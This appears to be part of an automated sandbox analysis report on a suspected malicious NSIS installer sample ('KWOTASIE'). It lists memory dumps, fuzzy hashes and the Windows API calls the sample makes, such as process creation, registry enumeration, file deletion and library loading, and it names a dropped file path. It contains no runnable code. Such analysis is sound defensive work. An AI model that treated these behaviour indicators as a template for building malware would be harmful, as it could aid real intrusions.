              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CloseQueryValue
              • String ID: Remove folder:
              • API String ID: 3356406503-1958208860
              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
              • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
              • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
              APIs
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
              • CloseHandle.KERNEL32(?), ref: 00405867
              Strings
              • Error launching installer, xrefs: 00405844
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: Error launching installer
              • API String ID: 3712363035-66219284
              • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
              • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
              • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
              • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
              • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
              • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
              • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
              • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
              • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
              • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
              • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
              • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
              • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
              • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
              • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
              • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
              • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
              • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
              • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
              • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
              • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
              • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
              • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
              • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
              • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
              APIs
              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402057
                • Part of subcall function 004052B0: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                • Part of subcall function 004052B0: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00403233), ref: 0040530B
                • Part of subcall function 004052B0: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\), ref: 0040531D
                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
              • String ID:
              • API String ID: 334405425-0
              • Opcode ID: 628baef28817a81c71994b7e30bb88f3b0fcf433efaa12a31af4226d967a1e72
              • Instruction ID: 1b7e6cc8a89e608973352e39bc6088f07de5daa2050f71ccd5864d961518f39c
              • Opcode Fuzzy Hash: 628baef28817a81c71994b7e30bb88f3b0fcf433efaa12a31af4226d967a1e72
              • Instruction Fuzzy Hash: 0321B331900218EBCF216FA5CE4DAAE7A70AF04354F60413BF511B51E1DBBD4951DA6E
              APIs
              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
              • RegCloseKey.ADVAPI32(?,?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,00000000,00000011,00000002), ref: 00402551
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Enum$CloseValue
              • String ID:
              • API String ID: 397863658-0
              • Opcode ID: 85de37ce9f1551cc19b4aaeaba6f815841acf3dc3c6dcfdbeb54887700a6ff00
              • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
              • Opcode Fuzzy Hash: 85de37ce9f1551cc19b4aaeaba6f815841acf3dc3c6dcfdbeb54887700a6ff00
              • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
              APIs
                • Part of subcall function 00405D19: GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
                • Part of subcall function 00405D19: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405D32
              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405AF4), ref: 0040592D
              • DeleteFileW.KERNEL32(?,?,?,00000000,00405AF4), ref: 00405935
              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040594D
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: File$Attributes$DeleteDirectoryRemove
              • String ID:
              • API String ID: 1655745494-0
              • Opcode ID: 280825f6b60181aa2d378306bbdc3da53de5ab3d89a200e418c4f7b9ea6af3cc
              • Instruction ID: 17dbb9b376b1e0a69a8f5a3d2989cdc6b1ef337040164146c9d977961067fcf0
              • Opcode Fuzzy Hash: 280825f6b60181aa2d378306bbdc3da53de5ab3d89a200e418c4f7b9ea6af3cc
              • Instruction Fuzzy Hash: C9E06571115A91DAC3507B359908B5F2F98EF86374F06493BF592B21D0C77848168A6E
              APIs
              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
              • RegCloseKey.ADVAPI32(?,?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,00000000,00000011,00000002), ref: 00402551
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CloseQueryValue
              • String ID:
              • API String ID: 3356406503-0
              • Opcode ID: 9b93021daec53c8edcc5d76aba2d99c2d32eec4d9dadaf17146ed5e41d543e33
              • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
              • Opcode Fuzzy Hash: 9b93021daec53c8edcc5d76aba2d99c2d32eec4d9dadaf17146ed5e41d543e33
              • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
              APIs
              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
